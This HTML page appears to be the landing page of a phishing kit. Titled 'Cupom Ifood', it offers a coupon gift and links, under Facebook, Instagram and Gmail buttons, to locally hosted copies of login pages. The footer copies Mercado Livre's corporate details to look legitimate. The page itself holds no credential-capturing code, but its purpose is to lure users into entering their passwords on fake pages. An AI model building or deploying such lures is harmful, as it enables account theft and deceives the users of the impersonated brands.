<!DOCTYPE html>

<html>
<head>
  <meta http-equiv="CONTENT-TYPE" content="text/html; charset=UTF-8">
  <title>Cupom Ifood</title>
  <style>
  *{padding:;
  margin-left:-1.5%;
background-image: url("");}
li{color:white;}
a#freefire{margin-left:32%;
  }
    body{ font-family: Arial;
      height: 100%;
      width:100%;
      margin-left:0%;}
      .bg{
        background-repeat: ;
       
        
        background-image: url(   giphy.webp);
padding:9%;
width:100%;
top:-10%;
margin-left:%;
background-repeat:;

      }
     
      ul{
      }
      a#logo{margin-left: -5%;
      margin-top:-50% ;
      padding:;
width:;
      height:;
      }
      input{margin-left:30%;
      width:600px;
      height:60px;
     
      }
      a#soci{margin-left:-4%;
        top:-10%;
      }
      li{list-style:none;}
      img#bcg{margin-left: -2%;}
      ::placeholder{font-size:20pt;}
      img#bla{
        border-radius: 25px;}
      
  </style>
  
</head>
<body class="bg"> 

 
<script>
 
 
</script>

</br>
 
<a id="logo" ><img src="th (9).jpeg" width="1140pt" ></a>
</br>
</br>
</br>
<a id="soci" ><img src="brinde.png" width="1100px" ></a>
 
     
       <a id="freefire" href="./insta/index.html"><img id="bla" src="https://upload.wikimedia.org/wikipedia/commons/thumb/7/7c/Facebook_New_Logo_%282015%29.svg/1024px-Facebook_New_Logo_%282015%29.svg.png" width="400px" margin-left="-10%"></img></a>
       </br>
       </br>
<a id="freefire" href="./Instagram/login.html"><img id="bla" src="kkk.jpg" width="400px" margin-left="-10%"></img></a>

</br>
</br>
<a id="freefire" href="./Gmail/login.html"><img id="bla" src="butgo.jpg" width="400px" height="150px" margin-left="-10%"></img></a>


<br/>
<br/>
</br>
</br>
</br>
</br>
</br>
</br>
<br/>
<br/>
</br>
</br>
</br>
</br>
</br>
</br>
<br/>
<br/>
</br>
</br>
</br>
</br>
</br>
</br>
  </br>
<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
<br/>

  <ul>

    <li>  © 1999-2023 Ebazar.com.br LTDA.
CNPJ n.º 03.007.331/0001-41 / Av. das Nações Unidas, nº 3.003, Bonfim, Osasco/SP - CEP 06233-903 - empresa do grupo Mercado Livre.</li>
  </ul>
</body>
</html>
